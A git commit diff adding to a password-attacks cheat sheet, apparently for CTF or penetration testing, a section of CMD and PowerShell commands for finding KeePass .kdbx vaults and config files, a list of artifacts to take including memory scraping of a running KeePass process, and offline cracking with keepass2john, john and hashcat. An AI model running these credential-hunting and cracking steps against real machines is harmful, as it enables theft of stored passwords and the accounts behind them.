commit 649ce0747272850e9e39961d03482817c8b934b4
parent 644453394b6a963663c140e879bc5598b8aaa556
Author: $: DAΞMON <zer0sec.xp@icloud.com>
Date: Thu, 17 Sep 2026 00:27:43 +0100
Add KeePass vault discovery commands to Windows credential hunting
Adds CMD and PowerShell one-liners for locating .kdbx files, related
artifacts to grab alongside a found vault, and offline cracking steps.
Co-Authored-By: Claude Sonnet 5 <noreply@anthropic.com>
Diffstat:
1 file changed, 30 insertions(+), 0 deletions(-)
diff --git a/src/content/sheets/password-attacks/windows-credential-flag-hunting.md b/src/content/sheets/password-attacks/windows-credential-flag-hunting.md
@@ -169,6 +169,36 @@ gci C:\Users -Recurse -Include *.rdp -EA 0 # saved RDP pr
gci $env:USERPROFILE\.aws\credentials,$env:USERPROFILE\.ssh\* -EA 0
```
+**Finding KeePass vaults — CMD**
+```cmd
+dir /s /b C:\*.kdbx
+where /r C:\ *.kdbx
+dir /s /b %USERPROFILE%\*.kdbx
+```
+
+**Finding KeePass vaults — PowerShell**
+```powershell
+Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -EA 0
+Get-ChildItem -Path C:\Users -Include *.kdbx,*.kdb -File -Recurse -EA 0 |
+ Select-Object FullName, LastWriteTime
+
+# KeePass config often leaks the key-file path or an auto-open DB path
+Get-ChildItem -Path C:\Users -Include KeePass.config.xml -File -Recurse -EA 0
+```
+
+**Related artifacts worth grabbing alongside the `.kdbx`**
+- `KeePass.config.xml` — may reference a key-file path or an auto-open DB
+- `*.key` files near the vault — possible key-file auth component
+- Live `KeePass.exe` process — memory can be scraped for the unlocked DB (e.g. `KeePassDumpFull`, or a mimikatz-style memory dump)
+- `%APPDATA%\Microsoft\Windows\Recent\` — shortcuts (`.lnk`) that reference a `.kdbx` path even if the vault itself has moved
+
+**Offline cracking**
+```bash
+keepass2john vault.kdbx > hash.txt
+john hash.txt
+# or: hashcat -m 13400 hash.txt wordlist.txt
+```
+
---
## Phase 5 — SAM / LSASS / DPAPI (local admin required)